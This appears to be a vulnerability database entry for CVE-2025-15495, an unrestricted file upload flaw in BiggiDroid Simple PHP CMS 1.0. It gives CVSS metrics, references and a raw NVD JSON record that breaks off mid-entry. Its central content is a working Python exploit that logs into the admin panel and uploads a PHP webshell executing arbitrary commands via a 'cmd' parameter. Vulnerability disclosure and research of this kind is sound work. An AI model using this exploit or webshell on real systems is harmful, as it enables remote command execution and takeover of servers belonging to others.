CVE-2025-15495

Description

A vulnerability was found in BiggiDroid Simple PHP CMS 1.0. This impacts an unknown function of the file /admin/editsite.php. The manipulation of the argument image results in unrestricted upload. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:biggidroid:simple_php_cms:1.0:*:*:*:*:*:*:* - VULNERABLE

BiggiDroid Simple PHP CMS 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15495 PoC - BiggiDroid Simple PHP CMS Unrestricted File Upload
# Target: BiggiDroid Simple PHP CMS 1.0
# Vulnerability: Unrestricted file upload in /admin/editsite.php (image parameter)

def exploit_upload(target_url, username, password, webshell_content):
    """
    Exploit the unrestricted file upload vulnerability
    """
    # Login to admin panel
    login_url = target_url + '/admin/index.php'
    login_data = {
        'username': username,
        'password': password
    }
    
    session = requests.Session()
    login_response = session.post(login_url, data=login_data)
    
    if 'admin' not in login_response.text.lower():
        print('[-] Login failed')
        return False
    
    print('[+] Login successful')
    
    # Upload malicious file
    upload_url = target_url + '/admin/editsite.php'
    files = {
        'image': ('shell.php', webshell_content, 'application/x-php')
    }
    
    try:
        upload_response = session.post(upload_url, files=files)
        print('[+] File upload attempted')
        
        # Check if upload was successful
        if upload_response.status_code == 200:
            print('[+] Exploit sent - Check for uploaded webshell')
            return True
    except Exception as e:
        print(f'[-] Error: {str(e)}')
        return False
    
    return False

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>')
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    # PHP webshell content
    webshell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>'
    
    exploit_upload(target, user, pwd, webshell)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15495
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15495
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15495/
[4] VulDB https://vuldb.com/cve/CVE-2025-15495
[5] https://gitee.com/hdert/ck/issues/IDGO28
[6] https://github.com/Asim-QAZi/RCE-Simplephpblog-biggiedroid
[7] https://vuldb.com/?ctiid.340273
[8] https://vuldb.com/?id.340273
[9] https://vuldb.com/?submit.725890
[10] https://vuldb.com/?submit.726040
[11] https://github.com/Asim-QAZi/RCE-Simplephpblog-biggiedroid

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15495", "sourceIdentifier": "[email protected]", "published": "2026-01-09T17:15:52.357", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in BiggiDroid Simple PHP CMS 1.0. This impacts an unknown function of the file /admin/editsite.php. The manipulation of the argument image results in unrestricted upload. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en BiggiDroid Simple PHP CMS 1.0. Esto afecta una función desconocida del archivo /admin/editsite.php. La manipulación del argumento image resulta en carga sin restricciones. El ataque puede ser lanzado remotamente. El exploit ha sido hecho público y podría ser usado. El proveedor fue contactado tempranamente sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:biggidroid:simple_php_cms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F8E2916D-54CD-4685-A440-3C903FF5B2C9"}]}]}], "references": [{"url": "https://gitee.com/hdert/ck/issues/IDGO28", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/Asim-QAZi/RCE-Simplephpblog-biggiedroid", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.340273", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb. ... (truncated)